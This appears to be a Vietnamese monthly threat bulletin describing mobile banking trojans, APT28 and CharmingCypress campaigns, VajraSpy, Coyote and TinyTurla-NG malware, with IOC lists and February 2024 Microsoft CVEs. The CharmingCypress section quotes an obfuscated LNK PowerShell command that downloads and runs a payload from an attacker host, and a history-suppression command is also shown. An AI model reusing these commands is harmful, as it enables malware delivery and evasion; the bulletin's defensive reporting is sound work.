Hàng tháng, NCS sẽ tổng hợp các thông tin bảo mật về APT, Malware, CVEs và gói gọn nó vào trong một bài viết
1 Các mối đe dọa nâng cao – Advanced Threats
1.1 Mã độc trên mobile gia tăng và phát triển trên cả môi trường Android và iOS nhắm tới Việt Nam và các nước thuộc khu vực APAC
Trong năm 2023, nhiều báo cáo đã được công bố, chỉ ra một Trojan Android – GoldDigger (theo Group-IB) nhắm nhiều ứng dụng, tổ chức liên quan đến ngân hàng và ví điện tử tại Việt Nam và liên tục gia tăng, phát triển nhắm mục tiêu tới khu vực Châu Á – Thái Bình Dương (APAC).
Gần đây, ghi nhận các mã độc thuộc họ GoldDigger trên môi trường Android, thông qua lừa đảo trực tuyến, với một số trường hợp kẻ tấn công đóng giả là nhân viên, cán bộ yêu cầu nạn nhân hoàn thiện gấp các thủ tục hành chính bằng cách khai thông tin trên các ứng dụng. Các ứng dụng này là các ứng dụng độc hại được đăng trên các website được thiết giả mạo Google play với các tên miền như dichvucong[.]agovn[.]net, dichvucong[.]dancuquocgia[.]net, dichvucong[.]kgov[.]net, dichvucong[.]lgov[.]net, dichvucong[.]vgovn[.]net, các domain này đều được trỏ về chung một địa chỉ 137[.]220[.]194.7
Ứng dụng .apk có logo là hình ảnh quốc huy Việt Nam, với tên ứng dụng là Dịch Vụ Công, các bình luận về ứng dụng cũng được kẻ tấn công thêm vào nhằm tăng độ tin cậy. Giống như GoldDigger đã được công bố và phân tích trước đó, quá trình dịch ngược apk cũng như thư viện được gọi khá khó khăn khi các phân vùng này bị encrypt cũng phát hiện một chuỗi có tên virbox, một protector có các tính năng bảo vệ mã nguồn nhằm khó khăn trong quá trình phân tích.
Để phân tích, cần cài đặt và khởi chạy ứng dụng, sau đó dump xuống memory tiến trình của ứng dụng này sẽ thu được các class giúp đọc được các đoạn mã rõ ràng hơn so với ban đầu. Ứng dụng này cũng thực hiện khai báo Accessiblity Service, cho phép ứng dụng có nhiều đặc quyền, tính năng này được lợi dụng bởi nhiều mã độc khác như Gigabud và GoldDigger để thưc hiện các hành vi độc hại như thu thập thông tin người dùng, đánh cắp thông tin đăng nhập, và một số thông tin liên quan đến các ngân hàng ở Việt Nam….
Với môi trường iOS, Group-IB gần đây cũng phát hiện ra một Trojan có tên GoldPickaxe.iOS, mã độc có khả năng thu thập dữ liệu nhận dạng khuôn mặt, chặn bắt tin nhắn SMS và ID documents. Ban đầu, ứng dụng này được phát tán trên TestFlight, một nền tảng thử nghiệm các ứng dụng của Apple. Sau khi xóa ứng dụng khỏi TestFlight, kẻ tấn công sử dụng cách thức phát tán phức tạp hơn, thông qua kỹ nghệ xã hội, kẻ tấn công thuyết phục nạn nhân cài đặt Mobile Device Management (MDM) profile (một chương trình giúp quản trị viên có thể thiết lập/cấu hình cho các nhân viên thuộc tổ chức). Các nạn nhân được Group-IB ghi nhận đều thuộc Việt Nam và Thái Lan
Indicators of Compromise (IOCs)
ks8cb[.]cc
bweri6[.]cc
ms2ve[.]cc
blsdk5[.]cc
zu7kt[.]cc
nnzf1[.]cc
t8bc[.]xyz
app[.]js6kk[.]xyz
bv8k[.]xyz
app[.]re6s[.]xyz
hzc5[.]xyz
app[.]bc2k[.]xyz
4571f8c8560a8a66a90763d7236f55273750cf8dd8f4fdf443b5a07d7a93a3df
b72d9a6bd2c350f47c06dfa443ff7baa59eed090ead34bd553c0298ad6631875
d8834a21bc70fbe202cb7c865d97301540d4c27741380e877551e35be1b7276b
b5dd9b71d2a359450d590bcd924ff3e52eb51916635f7731331ab7218b69f3b9
1.2 Các phương pháp phổ biến được nhóm Pawn Storm sử dụng trong quá trình tấn công.
Pawn Storm (hay còn được biết với tên APT28, Forest Blizzard) là nhóm APT hoạt động từ năm 2004, nhắm mục tiêu tới nhiều lĩnh vực từ chính phủ, công nghiệp quốc phòng, năng lượng… Một số chiến dịch của nhóm được ghi nhận sử dụng lặp lại các kỹ thuật nhiều lần, một trong số đó là tấn công brute-force vào hệ thống của nạn nhân. Từ năm 2019, nhóm tấn công đã sử dụng cách thức này nhằm xâm nhập vào các máy chủ email và VPN của các tổ chức trên toàn thế giới.
Các chiến dịch này được cho là thành công, với việc ghi nhận hàng nghìn email được sử dụng cho mục đích lừa đảo trực tuyến (spear-phishing emails) hoặc làm bàn đạp cho các cuộc tấn công khác.
Để che dấu, nhóm tấn công sử dụng đa dạng các công cụ, bao gồm các dịch vụ VPN, Tor, data center… để cố gắng truy cập vào các tài khoản của các công ty và chính phủ. Nhóm tấn công cũng sử dụng lỗ hổng zero-day trong Outlook CVE-2023-23397 trong quá trình tấn công, bằng cách sử dụng các tài khoản email đã chiếm được trước đó gửi các email độc hại. Bắt đầu từ tháng 4 năm 2023, nhóm tấn công sử dụng các phương pháp phức tạp hơn, các file độc hại được lưu trữ trên nền tảng Mockbin sẽ được gửi đến các mục tiêu thông qua email. Tùy thuộc vào giá trị User-Agent và country codes, nạn nhân sẽ được chuyển hướng đến domain (domain thường kết thúc bởi infinityfreeapp[.]com) nhằm tải xuống file nén định dạng ZIP, bên trong có file shortcut LNK độc hại. Tệp tin LNK cho phép tải xuống các thực thi các tệp tin độc hại khác, có nhiều biến thể được ghi nhận như các tệp tin VBS, BAT hoặc powershell có nhiệm vụ đánh cắp mã băm Net-NTLMv2.
Vào cuối năm 2023, nhóm tấn công cũng phát động chiến dịch lừa đảo nhắm tới khu vực Châu Âu bằng cách sử dụng webhook[.]site nhằm thu thập thông tin xác thực của nạn nhân
Indicators of Compromise (IOCs)
14.198.168.140
24.11.70.85
202.73.49.182
202.55.80.225
24.142.165.2
42.98.5.225
45.83.90.11
45.91.95.181
50.173.136.70
61.14.68.33
62.4.36.126
68.76.150.97
69.51.2.106
69.162.253.21
73.80.9.137
74.208.228.186
80.246.28.58
85.195.206.7
85.240.182.23
89.96.196.150
87.249.139.239
87.249.139.243
89.117.88.2
95.85.72.160
101.255.119.42
108.165.249.2
109.169.22.87
113.160.234.229
141.98.255.143
144.76.16.109
149.50.208.22
149.102.246.51
166.0.24.2
168.205.200.55
174.53.242.108
176.67.83.7
181.209.99.204
183.178.180.158
185.132.17.160
185.147.214.177
193.138.218.161
194.14.208.15
194.14.217.63
195.231.67.193
202.175.177.238
203.149.168.34
213.32.252.221
216.131.111.138
52951f2d92e3d547bad86e33c1b0a8622ac391c614efa3c5d167d8a825937179
c8a86d0132b355ee8a22e48e81bb8aef71d3b418878df1bd9c46e53cfb3d2d61
4f3992b9dbd1c2a64588a5bc23f1b37a12a4355688d6e1a06408ea2449c59368
45e44afeb8b890004fd1cb535978d0754ceaa7129082cb72386a80a5532700d1
22ed5c5cd9c6a351398f1e56efdfb16d52cd33cb4b206237487a03443d3de893
9a798e0b14004e01c5f336aeb471816c11a62af851b1a0f36284078b8cf09847
243bab79863327915c315c188c0589202f64b3500a3fee3e2c9f3d34e8e1f154
2f1c2afdf17831e744841029bb5d5a3ea9fda569958303be03e50fb3a764913f
f5b7a2d9872312e000acbe3dc8153707acecc5ba184f97ad6014327db16549c7
ed56740c66609d2bbd39dc60cf29ee47743344a9a6861bee7c08ccfb27376506
19e95b32b77d8dfd294c085793cd542d82eddac8e772818fea2826fa02a5cc54
00ff432de1e4698d68a5ebc2f09056f230836b4cc9e4da8565286abaaade3ae6
9f31754206df706ad45b9a8f12c780295da1c71d98cdb6b8d119ab8001c64bf8
494b6bc171912c22ecc3613c93cbb46880a659a1c0a487de1221e40eb01c5b86
19d0c55ac466e4188c4370e204808ca0bc02bba480ec641da8190cb8aee92bdc
593583b312bf48b7748f4372e6f4a560fd38e969399cf2a96798e2594a517bf4
d84c39579e61c406380f37da7c2a6758ed9a4c9a0e7697c073e2ddbb563360cd
1b598c7c35f00d2c940dfd3745bd9e5d036df781d391b8f3603a2969c666761b
0429bdc6a302b4288aea1b1e2f2a7545731c50d647672fa65b012b2a2caa386e
1.3 CharmingCypress – Một số hình thức phát tán mã độc trong các chiến dịch
Volexity thường xuyên theo dõi nhóm tấn công APT có nguồn gốc từ Iran – CharmingCypress (hay còn gọi với các tên Charming Kitten, APT42, TA453), nhóm tấn công có nhiệm vụ thu thập thông tin tình báo – chính trị của các nước, tập trung vào các tổ chức tư vấn, phi chính phủ và nhà báo.
Trong các chiến dịch, nhóm tấn công sử dụng các kỹ nghệ xã hội social-engineering một cách tinh vi như tạo một trò chuyện kéo dài nhằm tạo độ tin cậy trước khi gửi các liên kết hoặc tệp tin độc hại, hay gần đây nhất, nhóm tấn công tạo một cuộc hội thảo trực tuyến giả mạo nhằm yêu cầu người tham gia cài đặt các ứng dụng VPN độc hại. Đa dạng các cách thức mà nhóm tấn công sử dụng nhằm phát tán mã độc
Phát tán mã thông qua email lừa đảo (Spear Phishing)
Nhóm tấn công giả mạo các cá nhân từ nhiều tổ chức khác nhau, liên quan đến truyền thông và nghiên cứu. Đăng ký các domain có tên gần giống với tên của các tổ chức từ đó tạo các cuộc trò chuyện, dẫn dụ nạn nhân tải xuống các tệp tin độc hại
Kết hợp RAR + LNK:
Sau quá trình spear phishing, người dùng sẽ tải xuống tệp tin nén định dạng .zip, bên trong có các files shortcut LNK độc hại. Tệp tin được nén với mật khẩu sẽ được gửi tới nạn nhân trong các email tiếp theo. Mỗi file LNK sẽ có cách thức lây nhiễm khác nhau, tuy nhiên đều cùng một nhiệm vụ mở một file tài liệu (decoy) nhằm lừa nạn nhân đồng thời tải xuống các tệp tin độc hại khác. Một ví dụ về một câu lệnh trong lnk
/c set fg=powershetsrll.exe -w 1 “$y=(wgetsrt -Urtsri httsrtps://wulpfsrqupnuqorhexiw.supabase[.]co/storage/v1/object/public/StarPj/AUN.txt -UseBatsrsicParsing).Cotsrntent; &(gctsrm *ketsr-e*)$y”; & call %fg:tsr=% |
Sử dụng ứng dụng VPN để triển khai các phần mềm độc hại
Các thông tin về các link sẽ được kẻ tấn công gửi tới nạn nhân thông qua email. Domain (rasaaneh-iiis[.]org và rasaanah-iiis[.]org) bắt chước domain hợp pháp rasanah-iiis[.]org. Khi người dùng truy cập tới các portal, website sẽ thực hiện kiểm tra thông tin đăng nhập và địa chỉ IP. Máy nạn nhân cần cài đặt VPN của kẻ tấn công mới có thể truy cập thành công. Nếu việc kiểm tra không thành công, trang web sẽ có một thông báo nhắc người dùng tải xuống và cài đặt ứng dụng VPN. Tùy thuộc vào hệ điều hành, nạn nhân sẽ được cung cấp các ứng dụng khác nhau. Với Windows, mã độc sẽ triển khai POWERLESS, với macOS là NOKNOK.
POWERLESS trước đó đã được đánh giá là có liên quan và có sự trùng lặp với Phosphorous – một nhóm tấn công có nguồn gốc từ Iran. POWERLESS là một backdoor Powershell có đa dạng các nhiệm vụ như:
- Giao tiếp gửi nhận lệnh với C2 sử dụng mã hóa AES với khóa được gửi xuống từ server
- Tải xuống thêm các tệp tin độc hại cho phép ghi âm, đánh cắp thông tin trình duyệt, keylogger.
- Upload/download files
- Thực thi shell command
- Chụp ảnh màn hình
- Đánh cắp thông tin Telegram
- Thay đổi cấu hình, địa chỉ C2 trong bộ nhớ
Trong trường hợp này, bên cạnh các nhiệm vụ trên, nhóm tấn công cũng tạo các file có tên VPN vào thư mục OpenVPN, ghi dữ liệu nhận từ C2 vào C:\Users\Public\vconf, tải xuống tệp tin .NET có tên ctmon.exe. Tạo persistence thông qua registry HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon và thực thi. Ctmon.exe thực hiện giải mã vconf và trích xuất ra một tập các lệnh Powershell thực thi trong bộ nhớ. Đây là một phiên bản mới của POWERLESS với địa chỉ C2 là defaultbluemarker[.]info
Sử dụng trang web giả mạo
Việc xây dựng trang web giả mạo hội thảo cho thấy mức độ tinh vi và kỳ công của nhóm tấn công. Xây dựng đầy đủ từ các tab như Dashboard, Profile, Meeting cho tới logo của tổ chức bị mạo danh.
Indicators of Compromise (IOCs)
144.217.117.74
rasaanah-iiis.org
panel.rasaanah-iiis.org
149.28.133.236
beginningofgraylife.ddns.net
yellowparallelworld.ddns.net
defaultbluemarker.info
www.rasaaneh-iiis.org
rasaneh-iiis.org
rasaaneh-iiis.org
www.panel.rasaaneh-iiis.org
coral-polydactyl-dragonfruit.glitch.me
east-healthy-dress.glitch.me
wulpfsrqupnuqorhexiw.supabase.co
cloud-meeting-online.onrender.com
view-document-online.onrender.com
cloud-document-edit.onrender.com
prism-west-candy.glitch.me
185.36.189.81
editorservices.onrender.com
tgtoolsservice.onrender.com
ndrrftqrlblfecpupppp.supabase.com
1690cff04de44a26440d4fd15d0a0c11f64d3db670607ef658938690436b6636
ae67cd9c37127821e7768801dda7e8fb
e2ec9b77e3feb0c8f30f314ed15da2bbcde25ddc
37bb42720bfc1cf5d0e9d7b66be134b6431055ed8bdfd384f61ab7ac061d26eb
c79d85d0b9175cb86ce032543fe6b0d5
195e939e0ae70453c0817ebca8049e51bbd4a825
2d99755d5cd25f857d6d3aa15631b69f570d20f95c6743574f3d3e3e8765f33c
266305f34477b679e171375e12e6880f
607137996a8dc4d449185586ecfbe886e120e6b1
35f062f46f42dce06804cc4e7b456c528618d650edcf1cf7f806c016e88b3d19
c3fe93fc9133c0bc4b441798b9bcf151
87f36a0279b31a4a2f9b1123674e3dea130f1554
f1ee5dd179f66f597edfeb4b2c73c6adb4b7b6d4dcfb0bef33ee5c285148d085
9b6c308f106e72394a89fac083de9934
27b38cf6667936c74ed758434196d2ac9d14deae
1feade2bbd4dbc0b2052213d792b83c969928a150dce332746a6b5426ac93e4f
bd41c99df6945650727f871c6ed3f95b
1f16544eb41f4b5146cee457504b8b13d10a91e1
a8622dccb40a9fe9c2123f661e32e0a6bc40e95c88c9c2b764e603ce5eccb311
859a9e523c3308c120e82068829fab84
5bdec05bdca8176ae67054a3a7dc8c5ef0ac8deb
42477f0236e648f6e981db279406ca5f2a37a26cdf2baf472c41cb7f85f046e8
ac4e5a1df9c2ec889be088159e28ddb1
16f58fdb4443a963cea36de8c8500539e28d053d
11f0e38d9cf6e78f32fb2d3376badd47189b5c4456937cf382b8a574dc0d262d
a2729e8e105b76808da741263fc394be
01966af573124d90608167a5d544ac59b6c994ea
9ef84d6a709adbd6f29813ee145dbf542a69150e5ab4261e0d58de7ee371a8ef
5fc8668f9c516c2b08f34675380e2a57
c3fd8ed68c0ad2a97d76fc4430447581414e7a7e
c6f91e5585c2cbbb8d06b7f239e30b271f04393df4fb81815f6556fa4c793bb0
2edea0927601ef443fc31f9e9f8e7a77
cdce8a3e723c376fc87be4d769d37092e6591972
f6f0f682668f78dbecfc30a0e0c76b6a3d86298869fb44b39adf19fdcdca5762
78e4975dc56e62226f4c56850efb452b
1f974d7634103536e524a41a79046785ca7ae3d6
1ffc0bb577e4605059143a5cca213fbe0762c320c74174fe3c2a8f4878c85fc0
3fbf3ce1a9b452421970810bd6b6b37a
729346dfdd2203a9943119bac03419d63554c4b8
13b659e009577ab7890157ce00cc5c3641049f46135d5be2b1c17ca88a1490f9
a517bcb4d8c24dfe750110a91252c26c
09b527ddb848d7697f34ab34c2bce30da6f24238
fdc5d6caaaa4fb14e62bd42544e8bb8e9b02220e687d5936a6838a7115334c51
e851147f1d5dc5236ed2085cd5e513e7
2a2610344bf8db66b1e13302e54e4ef77712aada
07384ab4488ea795affc923851e00ebc2ead3f01b57be6bf8358d7659e9ee407
853687659483d215309941dae391a68f
25005352eff725afc93214cac14f0aa8e58ca409
ec56acef275a0e987844e98afcc44bf8b83b4661e83f89c6a2a72c5811d5f
4d75ed2a0a1016734a561295a49acb83
5b5a226b906bf83c4f6ef49189f4bde560398edb
1e7d2390a64abf51291d58a4104341664ec3c4f9989e07bdf612ecbe53f1231c
2a6c530a0f9a556fce5e9ca5e4c72fc0
ad4bb732e76ed609c227d6c16691b0ee50f1c692
b0f0aeded0aa68cfa17353faaf2093d35237758cdb668fff91f915092c9696ed
406e1402dd2e39bfba8b7e903aab41a3
4da8f471528cc588133b93b7dc6520f8772153d6
10460becafe4a67b959d9eaa09fb391d4ed46c083843ca3ab28c36e803760e41
e9c8ced8a36d560a7e01bc818c1c0113
3a002ae6855d551cf29f0c11db8c484261197214
bd7db9d9617c6108ed363cc2622594e9fd6932ed2c25f403bd1cc83bc9a21a1d
dd8466a7b634cc316585e23c39b389d4
6a9c095728702b47b7a3a9b4f6d57ea5884df50e
cfd340b4b4b3698f87acd1bebe8bec3d3ff48bfd6513a73c9aa3975d2cfe84c3
481c2bff3198bc3f0a357d4c23bf6c8a
89ae0407ee20cbdd12f52dbc535fedd4fdd36ae1
ea308c76a2f927b160a143d94072b0dce232e04b751f0c6432a94e05164e716d
43141e85e7c36e31b52b22ab94d5e574
cfd7079a9b268d84b856dc668edbb9ab9ef35312
a288618325a42a22fc642a73c5f5a39409a229e7f7aedec0043839b1e1483266
7756b32f21777074937ee223e4c70e9c
5cccda13b5e6ff30ccf263ad7b5c6ace18bd3c90
56cd102b9fc7f3523dad01d632525ff673259dbc9a091be0feff333c931574f7
4b1620523670f271a49420e8eea80f59
e3e7343054bec2926d09153ad5c24036dca626d7
e4e7f08d9a9a662b5615e8fcbb6cd3c711ecab6341a60562bbeff9ccca43f7e0
1009e5b3884fffc9926a2e97ccdf8408
15ef775adbddd1f9515860f322fcfdb1f81fbb49
8803b8faa6e6ee4c3cdf31b6d6b4af104be8650e2ff63a9b9818b3e2596fdc5b
541992d309adb62a6ae30724f356e5fd
969aef62b09ac68e4cd526fecc91e87f883afc58
1.4 VajraSpy – Android RAT sử dụng bởi Patchwork APT
ESET xác định được 12 ứng dụng Android, 6 ứng dụng có sẵn trên Google Play, các ứng dụng còn lại được tìm thấy trên VirusTotal. Các ứng dụng này là các ứng dụng nhắn tin và theo dõi tin tức, được phát tán thông qua hình thức lừa đảo, liên lạc với nạn nhân và dụ dỗ nạn nhân cài đặt các ứng dụng nhắn tin tồn tại mã độc. Các ứng dụng này khi được cài đặt trong máy nạn nhân sẽ triển khai RAT (Remote Access Trojan) được sử dụng bởi Patchwork APT, nhóm tấn công có hoạt động gián điệp có chủ đích. VajraSpy có đa dạng các chức năng tùy thuộc vào quyền được cấp cho ứng dụng. VajraSpy cho phép đánh cắp danh bạ, tập tin, nhật ký cuộc gọi và tin nhắn SMS, trích xuất tin nhắn trong các ứng dụng như WhatsApp và Signal, ghi âm cuộc gọi và chụp ảnh bằng camera.
Các ứng dụng độc hại này được chia thành 3 nhóm:
Nhóm 1: Các ứng dụng nhắn tin với các chức năng cơ bản
Các ứng dụng có sẵn trên Google Play như MeetMe, Privee Talk… có sẵn các tính năng nhắn tin cơ bản, nhưng yêu cầu tạo tài khoản. Tuy nhiên VajraSpy vẫn được thực thi mà không phụ thuộc vào quá trình tạo tài khoản thành công hay không. Các ứng dụng độc hại này có các tính năng đánh cắp các dữ liệu bao gồm: thông tin liên lạc, tin nhắn SMS, nhật ký cuộc gọi, vị trí thiết bị, danh sách các ứng dụng được cài đặt và các tệp có phần mở rộng với các định dạng (.pdf, .doc, .docx, .txt, .ppt, .pptx, .xls, .xlsx, .jpg, .jpeg, .png, .mp3, .Om4a, .aac và .opus). Bên cạnh các tính năng trên, nếu được phép cấp các quyền, trojan cũng có thể chặn các tin nhắn từ bất kỳ ứng dụng nhắn tin bao gồm cả tin nhắn SMS.
Nhóm 2: Các ứng dụng nhắn tin với các chức năng nâng cao
Các ứng dụng bao gồm TikTalk, Nidus, YohooTalk, Wave Chat và Crazy Talk (đã được Meta và QiAnXin mô tả). Tương tự như nhóm 1, các ứng dụng này cũng yêu cầu thiết lập tài khoản, bên cạnh các tính năng cơ bản, các tính năng nâng cao sẽ có nhiệm vụ chặn bắt các liên lạc trong các ứng dụng như WhatsApp, WhatsApp Business và Signal. Trojan lưu lại các thông tin từ ứng dụng và lưu vào cơ sở dữ liệu tại local, sau đó dữ liệu này sẽ được tải lên máy chủ C2 được lưu trữ trên FireBase
WaveChat, một trong số ứng dụng thuộc nhóm 2, có thêm các tính năng độc hại khi được cung cấp quyền accessibility services như ghi âm cuộc gọi điện thoại hoặc từ các ứng dụng, chụp ảnh bằng máy ảnh, ghi âm, scan Wifi.
Nhóm 3: Các ứng dụng còn lại
Các ứng dụng thuộc nhóm này thường là các ứng dụng có nhiệm vụ cung cấp tin tức, do không cần yêu cầu các quyền truy cập vào tin nhắn hoặc nhật ký cuộc gọi nên các tính năng sẽ bị hạn chế so với các ứng dụng thuộc nhóm 1 và nhóm 2. Ứng dụng thuộc nhóm này có chức năng chặn bắt để thu thập các thông tin liên lạc và các tệp tin có phần mở rộng đã được định nghĩa (.pdf, .doc, .docx, .txt, .ppt, .pptx, .xls, .xlsx, .jpg, .jpeg, .png, .mp3, .Om4a, .aac và .opus)
Indicators of Compromise (IOCs)
1B61DC3C2D2C222F92B84242F6FCB917D4BC5A61
BCD639806A143BD52F0C3892FA58050E0EEEF401
137BA80E443610D9D733C160CCDB9870F3792FB8
5F860D5201F9330291F25501505EBAB18F55F8DA
3B27A62D77C5B82E7E6902632DA3A3E5EF98E743
44E8F9D0CD935D0411B85409E146ACD10C80BF09
94DC9311B53C5D9CC5C40CD943C83B71BD75B18A
E0D73C035966C02DF7BCE66E6CE24E016607E62E
235897BCB9C14EB159E4E74DE2BC952B3AD5B63A
8AB01840972223B314BF3C9D9ED3389B420F717F
34.120.160[.]131
35.186.236[.]207
160.20.147[.]67
2 Malware
2.1 Coyote – Banking Trojan mới
Gần đây, Kaspersky phát hiện một phần mềm độc hại – banking Trojan mới nhắm tới người dùng của hơn 60 tổ chức ngân hàng thuộc Brazil. Đáng chú ý, các mã độc ngày phức tạp và sử dụng nhiều kỹ thuật mới, khác với những cách thức lây nhiễm đã biết trước đó.
Mã độc sử dụng Squirrel, một trong những công cụ/thư viện để quản lý cài đặt và cập nhật ứng dụng Windows để phát tán mã độc, tận dụng NodeJS và Nim trong quá trình lây nhiễm. Mã độc được gọi với tên Coyote, nó được cấu hình như là một package update.
Sau các bước trên, Trojan sẽ được thực thi. Coyote sử dụng mã hóa AES để mã hóa các chuỗi, với 16 bytes đầu đóng vai trò là IV (Initial Vector), phần còn lại là dữ liệu mã hóa. Khóa được tạo ngẫu nhiên mỗi lần thực thi
Coyote giám sát tất cả các ứng dụng đang được mở trên máy của nạn nhân và chờ các ứng dụng hoặc trang web ngân hàng được truy cập.
Nếu phát hiện bất kỳ truy cập hoặc ứng dụng nào liên quan đến ngân hàng được sử dụng, Coyote sẽ giao tiếp với C2 để gửi thông tin, dữ liệu được gửi bao gồm machine name, random GUID và ứng dụng banking đang sử dụng, sau đó chờ đợi lệnh từ C2, C2 sẽ phản hồi một chuỗi có dấu phân cách ngẫu nhiên, với độ dài của chuỗi đầu tiên sẽ là lệnh của C2, cụ thể như sau:
Length | Description |
12 | Take a screenshot |
14 | Show an overlay window of a fake banking app |
15 | Show a Window that is in the foreground |
17 | Kill a process |
18 | Show a full-screen overlay |
21 | Shut down the machine |
27 | Block machine with a fake banking image displaying: “Working on updates…” |
31 | Enable a keylogger |
32 | Move mouse cursor to specific X, Y position |
Indicators of Compromise (IOCs)
03eacccb664d517772a33255dff96020
071b6efd6d3ace1ad23ee0d6d3eead76
276f14d432601003b6bf0caa8cd82fec
5134e6925ff1397fdda0f3b48afec87b
bf9c9cc94056bcdae6e579e724e8dbbd
C2
atendesolucao[.]com
servicoasso[.]com
dowfinanceiro[.]com
centralsolucao[.]com
traktinves[.]com
diadaacaodegraca[.]com
segurancasys[.]com
2.2 Phân tích TinyTurla Next Generation – Backdoor
TinyTurla-NG, giống như TinyTurla sẽ thực thi dưới một Service DLL, khởi chạy thông qua svchost.exe. Các tính năng của mã độc sẽ được xử lý qua từng threads khác nhau. Bắt đầu với hàm ServiceMain function
Hàm InitCfgSetupCreateEvent khởi tạo các biến và sự kiện phục vụ cho mục đích đồng bộ hóa
Hàm CheckOSVersion_StartWorkerThreads() cũng thêm 2 luồng mới
Sau quá trình kiểm tra phiên bản của Powershell và Windows, ở luồng đầu tiên, mã độc gửi thông tin tới C2 “id” – nhằm định danh chiến dịch và thông báo “Client Ready” để ghi nhận lây nhiễm thành công. Sau bước trên, backdoor yêu cầu C2 thực hiện công việc nằm trong hàm gettask_loop()
Tại luồng thứ hai, mã độc chịu trách nhiệm thực thi công việc được gửi từ C2. Công việc này được thực thi sử dụng Powershell hoặc cmd dựa trên phiên bản đang chạy trên máy của nạn nhân. Mã độc tạo pipes để truyền và đọc output từ các câu lệnh. Với cmd.exe, trước khi thực thi các câu lệnh, mã độc sẽ chuyển code page sang 437 thông qua câu lệnh chcp 437 > NUL. Nếu sử dụng Powershell, backdoor sẽ thêm một đoạn mã nhằm tránh việc ghi lại lịch sử câu lệnh.
Set-PSReadLineOption -HistorySaveStyle SaveNothing |
Ngoài ra, backdoor cũng nhận các mã lệnh sau từ C2:
- Timeout: thay đổi timesleep
- Changeshell: thay đổi shell từ cmd sang powershell và ngược lại
- Changepoint: thay đổi C2
- Get: Sử dụng get request để lưu file vào vị trí do C2 chỉ định
- Post: đánh cắp tệp tin từ máy nạn nhân gửi đến C2
- Killme: tạo file BAT để xóa một tệp tin khỏi máy của nạn nhân. BAT được thực thi thông qua cmd /c
Backdoor cũng có tính năng đánh cắp dữ liệu thông qua các tệp lệnh Powershell được gọi với tên TurlaPower-NG. Đoạn script bao gồm địa chỉ C2 URL và đường dẫn của file. Mỗi khi đường dẫn được chỉ định, script sẽ liệt kê tất cả các tệp và lưu trữ trên đĩa, ngoại trừ các file có phần mở rộng là .mp4
File lưu trữ được đặt tên theo GUID với định dạng .zip, dữ liệu này sẽ được gửi tới C2 bằng POST request
Các C2 mà backdoor sử dụng hầu hết đều là WordPress tồn tại các lỗ hổng bảo mật. Kẻ tấn công đã chiếm quyền điều khiển sử dụng làm C2.
Indicators of Compromise (IOCs)
267071df79927abd1e57f57106924dd8a68e1c4ed74e7b69403cdcdf6e6a453b
d6ac21a409f35a80ba9ccfe58ae1ae32883e44ecc724e4ae8289e7465ab2cf40
hanagram[.]jp
thefinetreats[.]com
caduff-sa[.]ch
jeepcarlease[.]com
buy-new-car[.]com
carleasingguru[.]com
3 CVE và các khuyến nghị bảo mật
3.1 Microsoft Patch Tuesday – February 2024
Trong tháng 02, Microsoft đã phát hành các bản vá cho 72 CVE mới trong các sản phẩm của Microsoft Windows và Windows Components; Office và Office Components; Azure; .NET Framework và ASP.NET; SQL Server; Windows Hyper-V; và Microsoft Dynamics. Trong đó có 5 lỗ hổng được đánh giá mức độ Nghiêm trọng, 65 lỗ hổng được đánh giá là Important và 2 lỗ hổng được đánh giá mức độ Moderate. Dưới đây là các CVE nổi bật:
3.1.1 CVE-2024-21412– Internet Shortcut Files Security Feature Bypass Vulnerability
CVSS: 8.1/10
Mô tả: Tồn tại lỗ hổng cho phép kẻ tấn công vượt qua cơ chế bảo mật bằng cách tạo tệp tin độc hại dưới định dạng file Internet Shortcut (.url). Khai thác lỗ hổng yêu cầu tương tác từ người dùng. Lỗ hổng được Microsoft ghi nhận đã được các nhóm tấn công lợi dụng khai thác nhằm phát tán mã độc.
Phiên bản ảnh hưởng:
Windows Server 2019 (Server Core installation)
Windows 10 Version 1809 for 32-bit Systems
Windows 10 Version 1809 for x64-based Systems
Windows Server 2022, 23H2 Edition (Server Core installation)
Windows 11 Version 23H2 for x64-based Systems
Windows Server 2022
Windows 11 version 21H2 for x64-based Systems
Windows 11 Version 23H2 for ARM64-based Systems
Windows 10 Version 22H2 for 32-bit Systems
Windows 10 Version 22H2 for ARM64-based Systems
Windows Server 2019
Windows 10 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for ARM64-based Systems
Windows Server 2022 (Server Core installation)
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 10 Version 1809 for ARM64-based Systems
Windows 11 version 21H2 for ARM64-based Systems
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21412
3.1.2 CVE-2024-21351– Windows SmartScreen Security Feature Bypass Vulnerability
CVSS: 7.6/10
Mô tả: Tồn tại lỗ hổng cho phép kẻ tấn công vượt qua các tính năng bảo mật trong Windows Defender SmartScreen. Khai thác lỗ hổng yêu cầu lừa người dùng tương tác với tệp tin độc hại. Lỗ hổng được Microsoft ghi nhận đang được các nhóm tấn công lợi dụng khai thác.
Phiên bản ảnh hưởng:
Windows Server 2016
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 10 for 32-bit Systems
Windows 10 Version 22H2 for 32-bit Systems
Windows 10 Version 22H2 for ARM64-based Systems
Windows 10 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for ARM64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 11 version 21H2 for ARM64-based Systems
Windows 11 version 21H2 for x64-based Systems
Windows Server 2022
Windows Server 2019
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Windows 11 Version 23H2 for ARM64-based Systems
Windows 11 Version 23H2 for x64-based Systems
Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21351
3.1.3 CVE-2024-21410– Microsoft Exchange Server Elevation of Privilege Vulnerability.
CVSS: 9.8/10
Mô tả: Tồn tại lỗ hổng cho phép kẻ tấn công giả mạo các người dùng trên máy chủ Exchange bằng cách sử dụng các NTLM credentials.
Phiên bản ảnh hưởng:
Microsoft Exchange Server 2019 Cumulative Update 14
